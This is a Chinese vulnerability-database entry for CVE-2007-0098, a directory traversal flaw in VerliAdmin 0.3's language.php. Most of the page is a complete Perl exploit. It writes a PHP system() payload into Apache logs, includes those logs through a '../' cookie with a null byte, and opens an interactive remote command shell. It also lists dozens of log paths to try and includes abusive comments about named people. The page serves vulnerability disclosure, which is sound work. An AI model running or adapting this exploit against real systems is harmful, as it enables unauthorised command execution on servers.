VerliAdmin 'language.php'目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111933 漏洞类型 路径遍历
发布时间 2007-01-03 更新时间 2007-01-05
CVE编号 CVE-2007-0098 CNNVD-ID CNNVD-200701-023
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/3075
https://www.securityfocus.com/bid/86786
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-023
|漏洞详情
VerliAdmin0.3及之前版本的language.php中存在目录遍历漏洞。当magic_quotes_gpc被禁用时,远程攻击者可以借助langcookie中的..,包含和执行任意的本地文件。比如通过注入PHP序列到ApacheHTTP服务器登录文件,就会触发该漏洞。
|漏洞EXP
#!/usr/bin/perl
#
# VerliAdmin <= 0.3 Remote Command Execution Exploit
# linK : http://bohyn.czechweb.cz/
# d0rk: allinurl:"verliadmin"
#
# (c)od3d and f0unded by Kw3[R]Ln from Romanian Security Team a.K.A http://RST-CREW.NET
# Contact: ciriboflacs[AT]YaHOo.com or SkaskLL@msn.com
#
# Vurnerable Code in language.php: IF($_COOKIE['lang'] != "en")
#	                               {Include "language/".$_COOKIE['lang'].".php";}
#
# PS: fuck CacaBot, psyke and Sad_dreamer.. [top lamerZ]
# t0 psyke[pwn]: "y0ur c0de suqz. y0ur s1t3 suqz. y0u sm3ll 0f sh33p f3c3z. 3y3 th1nk y0u n33d t0 
#                t4k3 4n 0nl1n3 w3b d3s1gn c0urz3 0r s0m3th1ng. fuqn d0rk."


use IO::Socket;
use LWP::Simple;


@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);

print "[RST] VerliAdmin <= 0.3 Remote Command Execution Exploit\n";
print "[RST] need magic_quotes_gpc = off\n";
print "[RST] c0ded by Kw3rLN from Romanian Security Team [ http://rst-crew.net ] \n\n";


if (@ARGV < 3)
{
    print "[RST] Usage: VerliAdmin.pl [host] [path] [apache_path]\n\n";
    print "[RST] Apache Path: \n";
    $i = 0;
    while($apache[$i])
    { print "[$i] $apache[$i]\n";$i++;}
    exit();
}

$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];

print "[RST] Injecting some code in log files...\n";
$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "User-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "[RST] Shell!! write q to exit !\n";
print "[RST] IF not working try another apache path\n\n";

print "[shell] ";$cmd = <STDIN>;

while($cmd !~ "q") {
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n";

    print $socket "GET ".$path."language.php HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Cookie: lang=".$apache[$apachepath]."%00&cmd=$cmd\r\n";
    print $socket "Connection: close\r\n\n";

    while ($raspuns = <$socket>)
    {
        print $raspuns;
    }

    print "[shell] ";
    $cmd = <STDIN>;
}

# milw0rm.com [2007-01-03]
|受影响的产品
VerliAdmin VerliAdmin 0.3
|参考资料

来源:MILW0RM
名称:3075
链接:http://www.milw0rm.com/exploits/3075
来源:VUPEN
名称:ADV-2007-0035
链接:http://www.frsirt.com/english/advisories/2007/0035
来源:OSVDB
名称:32352
链接:http://osvdb.org/32352
来源:XF
名称:verliadmin-language-file-include(31241)
链接:http://xforce.iss.net/xforce/xfdb/31241
来源:MILW0RM
名称:3075
链接:http://milw0rm.com/exploits/3075